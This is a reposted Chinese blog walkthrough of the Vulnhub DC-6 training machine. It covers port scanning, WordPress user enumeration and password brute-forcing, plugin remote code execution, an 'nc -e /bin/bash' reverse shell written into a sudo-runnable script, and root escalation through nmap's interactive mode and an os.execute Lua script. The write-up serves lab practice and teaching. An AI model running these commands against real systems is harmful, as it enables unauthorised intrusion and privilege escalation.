ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Vulnhub_DC-6

2021-01-20 11:58:23  阅读:258  来源: 互联网

标签:nmap kali jens DC -- sh Vulnhub root


Vulnhub提示:

1611010235_600610bb1f3f573d7d256.png!small

扫描靶机IP地址:nmap -sP 192.168.10.0/24

1611010312_60061108b4d876776ee2e.png!small

扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129

1611010440_6006118840fe43f71aafa.png!small开放端口22,80

访问80端口发现URL被重定向到wordy

我们需要在host文件中添加

文件位置 /etc/hosts

1611010660_60061264a4c28ca946a86.png!small

可以访问到啦

1611010709_600612952edac0f42092d.png!small

扫描下目录结构吧,

御剑扫描

1611011738_6006169ac3a357562a00f.png!small

发现是wordpress站点

使用WPscan扫描

一款专注于wordpress站点扫描工具

wpscan -url wordy

1611011785_600616c96e185cd8e3b87.png!small

顺便枚举一下用户

1611011937_600617615d326140f16d5.png!small站点没发现什么漏洞,暴力破解尝试下

root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt

破解很久没获取密码,这时候想起Vulnhub重要提示

root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用这个字典在尝试下暴力破解

root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt

获得密码

mark
helpdesk01

登录后台发现Activity on Wordy插件存在远程代码执行漏洞

 

1611019799_600636170786947e77fbb.png!small

利用远程代码执行命令漏洞步骤:

step1:打开burpsuite工具设置代理

1611019933_6006369d8f14bf15aaa62.png!small

step2:

1611019949_600636adc1fd25a5b4220.png!smallstep3:发送到重写模块1611020049_600637118af16ce3bca3a.png!small

step4:kali打开端口监听

1611020150_6006377675115872eb9ab.png!smallstep5:1611020166_60063786e92870c7a5f12.png!small利用成功获取到webshell

横向移动搜寻可以利用的信息

成功找到了graham的密码信息

1611020431_6006388fdb0e8a9176464.png!small

查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本

1611020583_6006392741f4a4ab4780b.png!small

如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell

1611021187_60063b8393840cdbeb103.png!smallecho “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh

kali 端监听 8888 端口

1611021298_60063bf28cc8ee517260e.png!small

sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的

1611021327_60063c0f5279d3944ee7e.png!small

jens用户可以以 root权限执行 nmap 1611021444_60063c84d427ba0c9fff6.png!smallnmap 提权分为两种

旧版本上以进入交互提权

# 进入nmap的交互模式
nmap --interactive
# 执行sh,提权成功
!sh

新版本

echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF

1611023232_6006438080b1d2f35cca3.png!small1611023332_600643e42c26a338e14cb.png!small1611023372_6006440c1569151a45a4a.png!small

标签:nmap,kali,jens,DC,--,sh,Vulnhub,root
来源: https://blog.csdn.net/qq_45320164/article/details/112861579

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有